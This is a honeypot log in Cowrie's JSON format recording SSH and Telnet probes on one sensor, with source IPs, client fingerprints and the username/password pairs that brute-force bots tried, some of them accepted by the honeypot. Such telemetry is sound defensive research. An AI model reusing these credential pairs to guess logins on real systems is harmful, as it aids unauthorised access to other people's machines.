{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T20:00:04.475224Z","src_ip":"45.88.8.215","session":"b9d1acdb3a68"}
{"eventid":"cowrie.login.success","username":"root","password":"Ashok@123","message":"login attempt [root/Ashok@123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T20:00:06.543724Z","src_ip":"45.88.8.215","session":"b9d1acdb3a68"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:00:07.026443Z","src_ip":"45.88.8.215","session":"b9d1acdb3a68"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64684,"dst_ip":"1.2.3.4","dst_port":22,"session":"cdc2842ffc67","protocol":"ssh","message":"New connection: 217.72.205.35:64684 (1.2.3.4:22) [session: cdc2842ffc67]","sensor":"my-vps","timestamp":"2025-08-24T20:01:29.299885Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:01:29.301201Z","src_ip":"217.72.205.35","session":"cdc2842ffc67"}
{"eventid":"cowrie.session.connect","src_ip":"2.182.16.16","src_port":53414,"dst_ip":"1.2.3.4","dst_port":23,"session":"8aba2c950f37","protocol":"telnet","message":"New connection: 2.182.16.16:53414 (1.2.3.4:23) [session: 8aba2c950f37]","sensor":"my-vps","timestamp":"2025-08-24T20:01:34.828395Z"}
{"eventid":"cowrie.session.closed","duration":12.719582319259644,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:01:47.547908Z","src_ip":"2.182.16.16","session":"8aba2c950f37"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.71","src_port":57992,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5f31bfaf1d5","protocol":"ssh","message":"New connection: 92.118.39.71:57992 (1.2.3.4:22) [session: c5f31bfaf1d5]","sensor":"my-vps","timestamp":"2025-08-24T20:05:18.420944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T20:05:18.421954Z","src_ip":"92.118.39.71","session":"c5f31bfaf1d5"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-24T20:05:18.452165Z","src_ip":"92.118.39.71","session":"c5f31bfaf1d5"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-24T20:05:18.545054Z","src_ip":"92.118.39.71","session":"c5f31bfaf1d5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:05:19.577172Z","src_ip":"92.118.39.71","session":"c5f31bfaf1d5"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":40970,"dst_ip":"1.2.3.4","dst_port":22,"session":"65160e9b8a37","protocol":"ssh","message":"New connection: 45.88.8.186:40970 (1.2.3.4:22) [session: 65160e9b8a37]","sensor":"my-vps","timestamp":"2025-08-24T20:06:26.140336Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T20:06:26.886265Z","src_ip":"45.88.8.186","session":"65160e9b8a37"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T20:06:26.886973Z","src_ip":"45.88.8.186","session":"65160e9b8a37"}
{"eventid":"cowrie.login.success","username":"root","password":"20212022","message":"login attempt [root/20212022] succeeded","sensor":"my-vps","timestamp":"2025-08-24T20:06:29.376737Z","src_ip":"45.88.8.186","session":"65160e9b8a37"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:06:30.005328Z","src_ip":"45.88.8.186","session":"65160e9b8a37"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":56978,"dst_ip":"1.2.3.4","dst_port":23,"session":"2d91d9abe239","protocol":"telnet","message":"New connection: 79.124.8.120:56978 (1.2.3.4:23) [session: 2d91d9abe239]","sensor":"my-vps","timestamp":"2025-08-24T20:06:34.171478Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-24T20:06:34.211678Z","src_ip":"79.124.8.120","session":"2d91d9abe239"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T20:06:34.263857Z","src_ip":"79.124.8.120","session":"2d91d9abe239"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49204,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2c439119487","protocol":"ssh","message":"New connection: 217.72.205.35:49204 (1.2.3.4:22) [session: f2c439119487]","sensor":"my-vps","timestamp":"2025-08-24T20:08:06.189152Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:08:06.190235Z","src_ip":"217.72.205.35","session":"f2c439119487"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:09:34.299533Z","src_ip":"79.124.8.120","session":"2d91d9abe239"}
{"eventid":"cowrie.session.closed","duration":180.13116264343262,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:09:34.302558Z","src_ip":"79.124.8.120","session":"2d91d9abe239"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.71","src_port":35520,"dst_ip":"1.2.3.4","dst_port":22,"session":"e69d95865090","protocol":"ssh","message":"New connection: 92.118.39.71:35520 (1.2.3.4:22) [session: e69d95865090]","sensor":"my-vps","timestamp":"2025-08-24T20:11:51.610125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T20:11:51.611139Z","src_ip":"92.118.39.71","session":"e69d95865090"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-24T20:11:51.641017Z","src_ip":"92.118.39.71","session":"e69d95865090"}
{"eventid":"cowrie.login.failed","username":"user","password":"1","message":"login attempt [user/1] failed","sensor":"my-vps","timestamp":"2025-08-24T20:11:51.733484Z","src_ip":"92.118.39.71","session":"e69d95865090"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:11:52.766124Z","src_ip":"92.118.39.71","session":"e69d95865090"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.174.211","src_port":6102,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ac1bcdfc515","protocol":"ssh","message":"New connection: 146.190.174.211:6102 (1.2.3.4:22) [session: 8ac1bcdfc515]","sensor":"my-vps","timestamp":"2025-08-24T20:12:16.310831Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-24T20:12:16.475105Z","src_ip":"146.190.174.211","session":"8ac1bcdfc515"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-24T20:12:16.676633Z","src_ip":"146.190.174.211","session":"8ac1bcdfc515"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-24T20:12:18.583367Z","src_ip":"146.190.174.211","session":"8ac1bcdfc515"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:12:18.588187Z","src_ip":"146.190.174.211","session":"8ac1bcdfc515"}
{"eventid":"cowrie.session.connect","src_ip":"41.212.82.22","src_port":45844,"dst_ip":"1.2.3.4","dst_port":23,"session":"2fe040e255b0","protocol":"telnet","message":"New connection: 41.212.82.22:45844 (1.2.3.4:23) [session: 2fe040e255b0]","sensor":"my-vps","timestamp":"2025-08-24T20:13:29.651736Z"}
{"eventid":"cowrie.session.closed","duration":30.467671632766724,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:14:00.119339Z","src_ip":"41.212.82.22","session":"2fe040e255b0"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51388,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b90c2aa4b3f","protocol":"ssh","message":"New connection: 217.72.205.35:51388 (1.2.3.4:22) [session: 3b90c2aa4b3f]","sensor":"my-vps","timestamp":"2025-08-24T20:14:53.352439Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:14:53.353636Z","src_ip":"217.72.205.35","session":"3b90c2aa4b3f"}
{"eventid":"cowrie.session.connect","src_ip":"113.10.222.4","src_port":58630,"dst_ip":"1.2.3.4","dst_port":23,"session":"b4a47cafaf38","protocol":"telnet","message":"New connection: 113.10.222.4:58630 (1.2.3.4:23) [session: b4a47cafaf38]","sensor":"my-vps","timestamp":"2025-08-24T20:19:11.318757Z"}
{"eventid":"cowrie.session.closed","duration":120.10102248191833,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:21:11.419674Z","src_ip":"113.10.222.4","session":"b4a47cafaf38"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52738,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a3a6372ffd6","protocol":"ssh","message":"New connection: 217.72.205.35:52738 (1.2.3.4:22) [session: 9a3a6372ffd6]","sensor":"my-vps","timestamp":"2025-08-24T20:21:41.551886Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:21:41.553163Z","src_ip":"217.72.205.35","session":"9a3a6372ffd6"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":34262,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c78c626c3a2","protocol":"ssh","message":"New connection: 45.88.8.215:34262 (1.2.3.4:22) [session: 7c78c626c3a2]","sensor":"my-vps","timestamp":"2025-08-24T20:26:20.682935Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T20:26:21.089086Z","src_ip":"45.88.8.215","session":"7c78c626c3a2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T20:26:21.090269Z","src_ip":"45.88.8.215","session":"7c78c626c3a2"}
{"eventid":"cowrie.login.success","username":"root","password":"Avanish@123","message":"login attempt [root/Avanish@123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T20:26:23.843980Z","src_ip":"45.88.8.215","session":"7c78c626c3a2"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:26:24.279505Z","src_ip":"45.88.8.215","session":"7c78c626c3a2"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58772,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa77a5a2d798","protocol":"ssh","message":"New connection: 217.72.205.35:58772 (1.2.3.4:22) [session: aa77a5a2d798]","sensor":"my-vps","timestamp":"2025-08-24T20:28:15.635316Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:28:15.636524Z","src_ip":"217.72.205.35","session":"aa77a5a2d798"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":51262,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c50879919ac","protocol":"ssh","message":"New connection: 45.88.8.186:51262 (1.2.3.4:22) [session: 5c50879919ac]","sensor":"my-vps","timestamp":"2025-08-24T20:31:30.652124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T20:31:31.081239Z","src_ip":"45.88.8.186","session":"5c50879919ac"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T20:31:31.081892Z","src_ip":"45.88.8.186","session":"5c50879919ac"}
{"eventid":"cowrie.login.success","username":"root","password":"hajreza","message":"login attempt [root/hajreza] succeeded","sensor":"my-vps","timestamp":"2025-08-24T20:31:32.466954Z","src_ip":"45.88.8.186","session":"5c50879919ac"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:31:32.902054Z","src_ip":"45.88.8.186","session":"5c50879919ac"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55956,"dst_ip":"1.2.3.4","dst_port":22,"session":"106550ce2ade","protocol":"ssh","message":"New connection: 217.72.205.35:55956 (1.2.3.4:22) [session: 106550ce2ade]","sensor":"my-vps","timestamp":"2025-08-24T20:34:59.627185Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:34:59.628636Z","src_ip":"217.72.205.35","session":"106550ce2ade"}
{"eventid":"cowrie.session.connect","src_ip":"112.166.205.247","src_port":41356,"dst_ip":"1.2.3.4","dst_port":23,"session":"255967be3b86","protocol":"telnet","message":"New connection: 112.166.205.247:41356 (1.2.3.4:23) [session: 255967be3b86]","sensor":"my-vps","timestamp":"2025-08-24T20:36:01.880317Z"}
{"eventid":"cowrie.session.closed","duration":30.47327184677124,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-24T20:36:32.353492Z","src_ip":"112.166.205.247","session":"255967be3b86"}
{"eventid":"cowrie.session.connect","src_ip":"213.108.243.7","src_port":2449,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cd424685f84","protocol":"ssh","message":"New connection: 213.108.243.7:2449 (1.2.3.4:22) [session: 2cd424685f84]","sensor":"my-vps","timestamp":"2025-08-24T20:37:36.175151Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T20:37:36.176093Z","src_ip":"213.108.243.7","session":"2cd424685f84"}
